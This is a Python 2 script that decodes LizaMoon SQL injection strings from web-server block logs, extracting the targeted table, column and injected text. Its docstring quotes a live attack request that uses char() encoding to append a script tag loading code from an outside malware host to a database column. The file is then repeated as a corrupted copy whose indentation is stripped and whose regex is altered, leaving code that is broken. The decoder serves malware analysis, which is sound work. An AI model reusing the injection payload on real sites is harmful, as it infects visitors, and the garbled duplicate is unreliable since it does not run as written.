binjo/decode_lizamoon.py

## decode_lizamoon.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
decode_lizamoon.py

"2011-04-02 00:33:05","194.28.44.190","xxx.xxx.xxx.xxx","GET","http","xxx.xxx.xxx.xxx/en_publications_details.aspx?infoid=fd8c9e72-dfcb-4fdc-aad4-d524339bf6071'+update+tConferenceInfo+set+strDescription=REPLACE(cast(strDescription+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(116)%2Bchar(97)%2Bchar(100)%2Bchar(121)%2Bchar(103)%2Bchar(117)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--","SQL Injection","URL Query","000)),cast(char(32)+as+varchar(8)))--","block_log"
"""
__author__  = 'Binjo'
__version__ = '0.1'
__date__    = '2011-04-06 21:30:45'

import os, sys
import re

class Lizamoon(object):
    """klass of Lizamoon
    """

    def __init__(self, ):
        """
        """

        self._table = ""
        self._colmn = ""
        self._dcded = []

    def decode(self, data):
        """

        Arguments:
        - `self`:
        """
        r = re.match( r'.*update\+([^+].*?)\+set\+([^=].*?)=.*', data )
        if r is not None:
            self._table = r.group(1)
            self._colmn = r.group(2)

            k = "%s,%s," % ( self._table, self._colmn )

            p = data.find( "cast(char(" )
            q = data.find( ")+as+varchar(", p )
            if p != -1 and q != -1:
                k += ''.join( map( lambda x: chr(int(x)),
                                   data[p+10:q].replace(")%2Bchar(", " ").split(" ") ) )
                try:
                    self._dcded.index(k)
                except:
                    self._dcded.append(k)

    def x(self):
        """

        Arguments:
        - `self`:
        """
        for v in self._dcded:
            print v

def main():
    """TODO
    """
    if len(sys.argv) != 2:
        sys.exit( "%s lizamoon.txt" % sys.argv[0] )

    liza = Lizamoon()
    ctn  = open( sys.argv[1], 'rb' ).readlines()
    map( liza.decode, ctn )
    liza.x()
#-------------------------------------------------------------------------------
if __name__ == '__main__':
    main()
#-------------------------------------------------------------------------------
# EOF
	#!/usr/bin/env python
	# -- coding: utf-8 --

	"""
	decode_lizamoon.py

	"2011-04-02 00:33:05","194.28.44.190","xxx.xxx.xxx.xxx","GET","http","xxx.xxx.xxx.xxx/en_publications_details.aspx?infoid=fd8c9e72-dfcb-4fdc-aad4-d524339bf6071'+update+tConferenceInfo+set+strDescription=REPLACE(cast(strDescription+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(116)%2Bchar(97)%2Bchar(100)%2Bchar(121)%2Bchar(103)%2Bchar(117)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--","SQL Injection","URL Query","000)),cast(char(32)+as+varchar(8)))--","block_log"
	"""
	__author__ = 'Binjo'
	__version__ = '0.1'
	__date__ = '2011-04-06 21:30:45'

	import os, sys
	import re

	class Lizamoon(object):
	"""klass of Lizamoon
	"""

	def __init__(self, ):
	"""
	"""

	self._table = ""
	self._colmn = ""
	self._dcded = []

	def decode(self, data):
	"""

	Arguments:
	- `self`:
	"""
	r = re.match( r'.update\+([^+].?)\+set\+([^=].?)=.', data )
	if r is not None:
	self._table = r.group(1)
	self._colmn = r.group(2)

	k = "%s,%s," % ( self._table, self._colmn )

	p = data.find( "cast(char(" )
	q = data.find( ")+as+varchar(", p )
	if p != -1 and q != -1:
	k += ''.join( map( lambda x: chr(int(x)),
	data[p+10:q].replace(")%2Bchar(", " ").split(" ") ) )
	try:
	self._dcded.index(k)
	except:
	self._dcded.append(k)

	def x(self):
	"""

	Arguments:
	- `self`:
	"""
	for v in self._dcded:
	print v

	def main():
	"""TODO
	"""
	if len(sys.argv) != 2:
	sys.exit( "%s lizamoon.txt" % sys.argv[0] )

	liza = Lizamoon()
	ctn = open( sys.argv[1], 'rb' ).readlines()
	map( liza.decode, ctn )
	liza.x()
	#-------------------------------------------------------------------------------
	if __name__ == '__main__':
	main()
	#-------------------------------------------------------------------------------
	# EOF